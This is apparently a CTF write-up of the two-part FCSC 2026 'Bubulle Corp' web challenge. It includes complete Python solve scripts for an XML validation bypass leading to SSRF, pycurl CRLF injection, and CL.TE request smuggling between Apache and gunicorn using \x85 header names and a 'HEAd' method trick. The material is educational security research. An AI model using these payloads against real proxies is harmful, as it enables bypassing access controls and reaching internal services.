Bubulle Corp [EN]| FCSC 2026

April 11, 2026 - 13 mins read

Bubulle Corp 1 & 2 | FCSC 2026

Introduction

Bubulle Corp is a two-part web challenge from FCSC 2026. Both parts share the exact same source code: a three-service Docker setup with a Flask frontend, an Apache 2.4.66 reverse proxy, and a Flask/gunicorn 21.2.0 backend.

There are two flags hidden in the infra. The first one is kind of a decoy, just a plain flag.txt file sitting on the Apache proxy, served by an AliasMatch rule. Easy grab. The second one is the real deal: an environment variable FLAG on the backend, only reachable through GET /flag, an endpoint that Apache actively blocks from being proxied.

Getting that second flag requires chaining an XML parsing differential, a pycurl CRLF injection, and a CL.TE HTTP request smuggling desync that abuses a one-byte Unicode whitespace character difference between Apache and gunicorn.

Architecture

Three Docker containers, two isolated networks:

# docker-compose.yml
services:
  bubulle-corp-public-frontend:
    networks: [dmz]                 # Flask + pycurl, exposed on port 8000
  bubulle-corp-internal-proxy:
    networks: [dmz, internal]       # Apache 2.4.66, bridges both networks
  bubulle-corp-internal-backend:
    networks: [internal]            # gunicorn 21.2.0 + Flask, isolated

The frontend is on the dmz network and can’t resolve or reach the backend directly. Only way to the backend is through the Apache proxy which sits on both networks.

The Apache config is short but there’s a lot going on:

# src/internal-proxy/apache.conf
HttpProtocolOptions Unsafe

AliasMatch "^/.+" "/flag.txt"

<Location "/">
    ProxyPass http://bubulle-corp-internal-backend:5000/ keepalive=Off disablereuse=On
    ProxyPassReverse http://bubulle-corp-internal-backend:5000/
</Location>

<LocationMatch "^/.+">
    ProxyPass "!"
    Require all granted
</LocationMatch>

HttpProtocolOptions Unsafe relaxes RFC 7230 request validation. In httpd-2.4.66/server/protocol.c at line 724, this sets strict = 0, which makes the request parser use ap_scan_vchar_obstext() instead of ap_scan_http_token(). Basically bytes in the obs-text range (0x80 to 0xFF) become legal in HTTP method names, header names, and header values. This is the entry point for Part 2.

The <Location "/"> block is a prefix match that applies to every URL starting with /, so everything. It sets up a reverse proxy to the backend. Then <LocationMatch "^/.+"> immediately overrides it: for any path with at least one character after the leading /, ProxyPass "!" cancels the proxy, and AliasMatch "^/.+" "/flag.txt" serves the local flag file instead. So only the exact path / gets forwarded to the backend. Everything else returns flag.txt.

The backend is straightforward:

# src/internal-backend/app.py
@app.route("/", methods=["POST", "GET"])
def index():
    return "Hello World!"

@app.route("/flag")
def flag():
    return environ.get("FLAG")

It runs under gunicorn with --worker-class gevent and --keep-alive 5.

Source Code Audit

Settings Validation (routes.py)

When a user updates their profile, the frontend parses XML and validates it in src/public-frontend/app/routes.py, starting at line 83:

for elem in list(root):
    if elem.tag == "icon_url" and (not elem.text or not elem.text.startswith("https://")):
        return render_template("settings.html", user=user, error="Icon URL must start with https://")
    if elem.tag == "method" and elem.text not in ("GET", "POST"):
        return render_template("settings.html", user=user, error="Method must be GET or POST")
    if elem.tag not in ("icon_url", "method", "body"):
        root.remove(elem)

The loop iterates over list(root), which only yields direct children of the <settings> root element. Anything nested deeper is invisible to the validation. Also the body tag is explicitly allowed and never inspected.

Icon Fetching (icon.py)

When GET /icon is called, the stored XML is re-parsed in src/public-frontend/app/icon.py:

icon_url = root.find(".//icon_url").text   # line 8
method   = root.find(".//method").text     # line 9
body     = root.find(".//body").text if root.find(".//body") else None  # line 10

Ok so this is where it gets interesting. The .find(".//tag") XPath does a depth-first traversal of the entire document tree. If a <method> element exists inside a <body> element, it gets found before the sibling <method> at root level, because depth-first ordering visits children before siblings. The values then go straight to pycurl:

c.setopt(pycurl.URL, icon_url.encode("latin1"))          # line 17
c.setopt(pycurl.CUSTOMREQUEST, method.encode("latin1"))   # line 18
# ...
if body:
    c.setopt(pycurl.POSTFIELDS, body.encode("latin1"))    # line 27

The latin1 encoding is byte-transparent: every Unicode codepoint from U+0000 to U+00FF maps to the byte of the same value. Characters like \x85 (NEL) or \r\n survive the encoding as their raw byte equivalents. This matters a lot for Part 2. The PROTOCOLS option restricts pycurl to HTTP and HTTPS only, so no gopher:// tricks.

Part 1 | XML Parsing Differential

Flag: FCSC{c22f014ba1aac9b3c487989156c470b0}

The Vulnerability

The validation in routes.py and the consumption in icon.py use fundamentally different scoping to locate the same XML elements. Validator checks only direct children of <settings>. Consumer searches all descendants depth-first. So by nesting a malicious <icon_url> inside <body>, I can bypass the https:// check while still having the nested value be the one pycurl actually uses.

The Payload

<settings>
  <body><icon_url>http://bubulle-corp-internal-proxy/flag</icon_url></body>
  <icon_url>https://vozec.fr</icon_url>
  <method>GET</method>
</settings>

When the validator runs, it iterates over three direct children: <body>, <icon_url>, and <method>. It checks the direct <icon_url> which has https://vozec.fr and passes. Checks <method> which is GET, also passes. <body> is allowed and ignored.

When icon.py runs, root.find(".//icon_url") traverses depth-first. It enters <body> first and finds the nested <icon_url>http://bubulle-corp-internal-proxy/flag</icon_url> before ever reaching the outer one. pycurl makes GET http://bubulle-corp-internal-proxy/flag, which hits the Apache proxy. Path is /flag, so the AliasMatch rule serves flag.txt and I get the first flag.

Solve Script

import requests

BASE = "https://bubulle-corp.fcsc.fr"
s = requests.Session()
s.post(f"{BASE}/register", data={"username": "testuser123", "password": "P@ssword1"})
s.post(f"{BASE}/login", data={"username": "testuser123", "password": "P@ssword1"})

xml = """<settings>
  <body><icon_url>http://bubulle-corp-internal-proxy/flag</icon_url></body>
  <icon_url>https://vozec.fr</icon_url>
  <method>GET</method>
</settings>"""
s.post(f"{BASE}/settings", data={"settings": xml})
r = s.get(f"{BASE}/icon")
print(r.text)

FCSC{c22f014ba1aac9b3c487989156c470b0}

Part 2 | CL.TE Request Smuggling

The Goal

The second flag lives in the FLAG environment variable on the backend, served at GET /flag. Apache’s config ensures only / reaches the backend. Any request to /flag gets intercepted by <LocationMatch "^/.+"> and served from flag.txt. I need to make gunicorn process GET /flag even though Apache only forwards GET /.

HTTP request smuggling. I send a single request to Apache that, from Apache’s perspective, has a body containing opaque data. But from gunicorn’s perspective, that “body” actually contains a second, smuggled HTTP request. When gunicorn finishes processing the first request, it finds GET /flag waiting in its read buffer and processes it too.

Vulnerability 1: pycurl CUSTOMREQUEST CRLF Injection

libcurl’s CURLOPT_CUSTOMREQUEST inserts the provided string verbatim into the HTTP request line with no CRLF filtering. If the string contains \r\n, those bytes appear raw on the wire, which lets me inject complete HTTP headers and even terminate the request to start a new one.

Combined with the XML bypass from Part 1, I control three parameters: the pycurl URL, the HTTP method string (with arbitrary CRLF injection), and the POST body via POSTFIELDS. Encoding is latin1, so every byte 0x00-0xFF is available.

Since lxml normalizes \r and \n during XML parsing, I use XML character references to preserve them:  for CR, 
 for LF,  for NEL. lxml resolves these to the actual Unicode codepoints, which then survive str.encode("latin1") as the raw bytes \x0D, \x0A, and \x85.

Vulnerability 2: CL.TE Desync via Transfer-Encoding\x85

This is the core of the smuggling, a parsing discrepancy between Apache and gunicorn on the Transfer-Encoding header.

Apache side. In httpd-2.4.66/modules/proxy/proxy_util.c at lines 4615-4617, Apache strips the Transfer-Encoding header by exact name lookup:

if ((*old_te_val = (char *)apr_table_get(r->headers_in, "Transfer-Encoding"))) {
    apr_table_unset(r->headers_in, "Transfer-Encoding");
}

apr_table_get does case-insensitive but otherwise exact string comparison. The header name Transfer-Encoding\x85 is a different string from Transfer-Encoding, so Apache doesn’t recognize it, doesn’t strip it, and forwards it untouched to the backend. Since Apache sees no Transfer-Encoding header, it falls back to Content-Length to determine the body size.

gunicorn side. In gunicorn-21.2.0/gunicorn/http/message.py at lines 88-96, the header name goes through name.upper() and then name.strip():

name = name.upper()
if HEADER_RE.search(name):
    raise InvalidHeaderName(name)
name, value = name.strip(), [value.lstrip()]

The HEADER_RE regex at line 24 is [\x00-\x1F\x7F()<>@,;:\[\]={} \t\\"]. The byte \x85 is not in this range (above \x7F but not \x7F itself), so the check passes. Then Python’s str.strip() removes Unicode whitespace, and U+0085 (NEL, Next Line) is classified as Unicode whitespace. So "TRANSFER-ENCODING\x85" becomes "TRANSFER-ENCODING" after stripping.

At lines 134-139, gunicorn’s body reader finds this header and enables chunked framing:

elif name == "TRANSFER-ENCODING":
    if value.lower() == "chunked":
        chunked = True

if chunked:
    self.body = Body(ChunkedReader(self, self.unreader))

Desync complete: Apache reads the body using Content-Length (forwarding all N bytes), while gunicorn reads it as chunked (stopping at chunk 0\r\n\r\n and leaving the rest in its buffer as a new request).

Vulnerability 3: Connection Keep-Alive Bypass

After gunicorn processes the first request (POST /), it needs to keep the TCP connection alive to process the smuggled GET /flag. But Apache’s terminate_headers() in httpd-2.4.66/modules/proxy/mod_proxy_http.c (lines 437-497) adds Connection: close to every proxied request because disablereuse=On makes ap_proxy_connection_reusable() return false.

Same \x85 trick works here. I inject Connection\x85: keep-alive in the request. Apache doesn’t recognize Connection\x85 as the Connection header, so it doesn’t strip it. It also appends its own Connection: close at the end.

gunicorn’s should_close() in gunicorn-21.2.0/gunicorn/http/message.py at lines 156-165 iterates headers in order and returns on the first CONNECTION match:

def should_close(self):
    for (h, v) in self.headers:
        if h == "CONNECTION":
            v = v.lower().strip()
            if v == "close":
                return True
            elif v == "keep-alive":
                return False
            break
    return self.version <= (1, 0)

Because my injected Connection\x85: keep-alive appears before Apache’s Connection: close in the header list, gunicorn strips the \x85, finds CONNECTION: keep-alive, returns False, and keeps the connection alive. The smuggled GET /flag gets processed as a second pipelined request.

The disablereuse=On Challenge

With disablereuse=On, Apache unconditionally destroys the backend socket after reading the first response. In httpd-2.4.66/modules/proxy/proxy_util.c at lines 1636-1683, connection_cleanup() checks !worker->s->is_address_reusable and calls apr_pool_clear(p), which runs all registered cleanup callbacks including socket destruction:

if (!worker->s->is_address_reusable) {
    apr_pool_t *p = conn->pool;
    apr_pool_clear(p);
    conn = connection_make(p, worker);
}

So Apache reads gunicorn’s first response (Hello World!, CL=12), then closes the socket. The second response (the flag from GET /flag) is still in gunicorn’s TCP send buffer but gets discarded when the socket closes.

To read the flag response, I would need Apache to enter BODY_NONE mode (read-until-close), which happens in httpd-2.4.66/modules/http/http_filters.c at lines 362-444 when the backend response has neither Content-Length nor Transfer-Encoding. In that mode, for proxy responses (line 444 check is skipped for PROXYREQ_RESPONSE), Apache reads all data until the connection closes which would include the flag. But Flask always sets Content-Length on string responses, so gunicorn’s response always has CL, and Apache uses BODY_LENGTH mode, reading exactly CL bytes and ignoring the rest.

The first exploit below assumes disablereuse=Off (modified configuration), where Apache reuses the backend connection and the smuggled response can be read by a second proxied request hitting the same socket.

First exploit

import re
import requests
from lxml import etree as ET

BASE = "https://bubulle-corp.fcsc.fr"

def xml_enc(s):
    return (s
        .replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
        .replace("\r\n", "&#xD;&#xA;")
        .replace("\r", "&#xD;").replace("\n", "&#xA;")
        .replace("\x85", "&#x85;")
    )

def ssrf(sess, method, body=None):
    bxml = xml_enc(body) if body else ""
    xml = (
        "<settings>"
            f"<body>{bxml}"
                f"<method>{xml_enc(method)}</method>"
                "<icon_url>http://bubulle-corp-internal-proxy/</icon_url>"
            "</body>"
            "<method>POST</method>"
            "<icon_url>https://x</icon_url>"
        "</settings>"
    )
    sess.post(f"{BASE}/settings", data={"settings": xml})
    return sess.get(f"{BASE}/icon").content

s = requests.Session()
s.post(f"{BASE}/register", data={"username": "vozec42", "password": "P@ssword1"})
s.post(f"{BASE}/login", data={"username": "vozec42", "password": "P@ssword1"})

method = (
    "POST / HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-proxy\r\n"
    "Transfer-Encoding\x85: chunked\r\n"
    "Connection\x85: keep-alive\r\n"
    "Foo: "
)

body = (
    "0\r\n"
    "\r\n"
    "GET /flag HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-backend:5000\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

r = ssrf(s, method, body)
print(r)

b'Hello World!'

The method string exploits the CRLF injection to craft a complete POST / request line with the smuggling headers. Foo: at the end absorbs pycurl’s auto-appended {path} HTTP/1.1\r\n into a harmless header value. The body string becomes the POSTFIELDS content, providing the CL.TE payload: a zero-length chunk terminator followed by the smuggled GET /flag request. Apache reads the body by Content-Length (all of it gets forwarded), while gunicorn reads only the chunk terminator and treats the rest as a new pipelined request.

The HEAd Case Trick

After a while I noticed something interesting in the Apache source while reading HttpProtocolOptions Unsafe more carefully. When Apache parses the request method, it determines whether the request is a HEAD by looking at the result of lookup_builtin_method(). This function, defined in httpd-2.4.66/modules/http/http_protocol.c at line 758, uses an optimized switch/case lookup that compares characters one by one, case-sensitively:

// http_protocol.c:789-796
case 4:
    switch (method[0])
    {
    case 'H':
        return (method[1] == 'E'
                && method[2] == 'A'
                && method[3] == 'D'          // case-sensitive
                ? M_GET : UNKNOWN_METHOD);

For HEAD (all uppercase), this returns M_GET. Then in protocol.c at lines 880-882:

// protocol.c:880-882
r->method_number = ap_method_number_of(r->method);
if (r->method_number == M_GET && r->method[0] == 'H')
    r->header_only = 1;

This sets r->header_only = 1, telling Apache the response has no body. Later in mod_proxy_http.c at line 1645, this flag determines whether Apache reads a body from the backend:

// mod_proxy_http.c:1645-1647
if ((!r->header_only) &&                   /* not HEAD request */
    (proxy_status != HTTP_NO_CONTENT) &&
    (proxy_status != HTTP_NOT_MODIFIED)) {

Here’s the key insight. If I send HEAd instead of HEAD (lowercase d), the lookup at http_protocol.c:795 compares method[3] against 'D'. Since 'd' != 'D', it returns UNKNOWN_METHOD. Back in protocol.c:880, r->method_number is M_INVALID, the condition r->method_number == M_GET is false, and r->header_only stays at 0. Apache doesn’t know this is a HEAD request. It expects a full response body.

With HttpProtocolOptions Unsafe and the default LenientMethods, Apache accepts unknown methods without error. It happily proxies HEAd / to the backend.

On the gunicorn side, the method validation in gunicorn-21.2.0/gunicorn/http/message.py at line 336 uses a regex that performs a prefix match:

# message.py:25
METH_RE = re.compile(r"[A-Z0-9$-_.]{3,20}")

# message.py:336-338
if not METH_RE.match(bits[0]):
    raise InvalidRequestMethod(bits[0])
self.method = bits[0].upper()

re.match() checks from the start of the string but doesn’t require consuming the full string. For "HEAd", it matches "HEA" (3 characters, satisfying {3,20}), so the check passes. Then bits[0].upper() converts "HEAd" to "HEAD". From this point on, gunicorn treats it as a standard HEAD request. Flask processes it as HEAD (returns headers but no body), and gunicorn’s is_chunked() at wsgi.py:286 returns False for HEAD, while should_close() at wsgi.py:217 also returns False (keeping the connection alive for the smuggled requests).

The result is a response desync: gunicorn sends a response with Content-Length but no body (because it thinks it’s HEAD), while Apache reads the response and expects Content-Length bytes of body (because it doesn’t think it’s HEAD). Apache reads those bytes from the next data on the connection, which is the smuggled GET /flag response.

Increasing Content-Length with Script_Name

Without Script_Name, the backend’s GET / returns Hello World! with Content-Length: 12. Apache would try to read 12 bytes of “body” from the connection, which gives only the first few bytes of the flag response HTTP status line. Not enough to capture the actual flag.

I use the Script_Name header to trigger a 308 redirect with a much larger body. In gunicorn-21.2.0/gunicorn/http/wsgi.py at lines 127-128 and 181-183:

# wsgi.py:127-128
elif hdr_name == "SCRIPT_NAME":
    script_name = hdr_value

# wsgi.py:181-183
path_info = req.path
if script_name:
    path_info = path_info.split(script_name, 1)[1]

When Script_Name is set to / and the request path is /, the split produces "/".split("/", 1)[1] which is "". Flask receives an empty PATH_INFO, interprets it as a missing trailing slash, and returns a 308 Permanent Redirect to /. The redirect response body is a standard HTML page of exactly 271 bytes, giving me Content-Length: 271 in the response headers. Since gunicorn believes this is HEAD, no body is sent. Apache, unaware it’s HEAD, reads 271 bytes from the connection and finds the smuggled GET /flag response.

Filling the Buffer

The flag response from the backend includes HTTP headers and the flag body, totaling roughly 200 bytes. If I only smuggle a single GET /flag, Apache reads 200 bytes and then waits for the remaining 71 bytes, timing out. To avoid this, I smuggle multiple GET /flag requests. Their responses chain on the connection, and Apache reads through them until it has consumed 271 bytes. The flag appears within the first response, well inside the 271-byte window.

Final Exploit

import re
import requests
from lxml import etree as ET

BASE = "https://bubulle-corp.fcsc.fr"

def xml_enc(s):
    return (s
        .replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
        .replace("\r\n", "&#xD;&#xA;")
        .replace("\r", "&#xD;").replace("\n", "&#xA;")
        .replace("\x85", "&#x85;")
    )

def ssrf(sess, method, body=None):
    bxml = xml_enc(body) if body else ""
    xml = (
        "<settings>"
            f"<body>{bxml}"
                f"<method>{xml_enc(method)}</method>"
                "<icon_url>http://bubulle-corp-internal-proxy/</icon_url>"
            "</body>"
            "<method>POST</method>"
            "<icon_url>https://x</icon_url>"
        "</settings>"
    )
    sess.post(f"{BASE}/settings", data={"settings": xml})
    return sess.get(f"{BASE}/icon").content

s = requests.Session()
s.post(f"{BASE}/register", data={"username": "vozec42", "password": "P@ssword1"})
s.post(f"{BASE}/login", data={"username": "vozec42", "password": "P@ssword1"})

smuggled = (
    "GET /flag HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-backend:5000\r\n"
    "\r\n"
)

method = (
    "HEAd / HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-proxy\r\n"
    "Script_Name: /\r\n"
    "Transfer-Encoding\x85: chunked\r\n"
    "Connection\x85: keep-alive\r\n"
    "Foo: "
)

body = (
    "0\r\n"
    "\r\n"
    + smuggled * 3
)

r = ssrf(s, method, body)
print(r)

FCSC{7a17b107ecc0b7db613f9e202c026f5e}